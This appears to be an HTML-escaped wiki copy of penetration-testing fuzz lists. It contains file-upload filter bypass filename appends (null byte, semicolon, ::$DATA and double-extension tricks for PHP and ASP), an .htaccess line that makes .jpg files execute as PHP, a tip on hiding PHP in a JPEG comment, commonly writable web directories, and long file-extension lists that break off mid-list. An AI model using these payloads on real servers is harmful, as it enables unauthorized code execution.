# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (&amp;lt;pre&amp;gt;Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863) ===&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
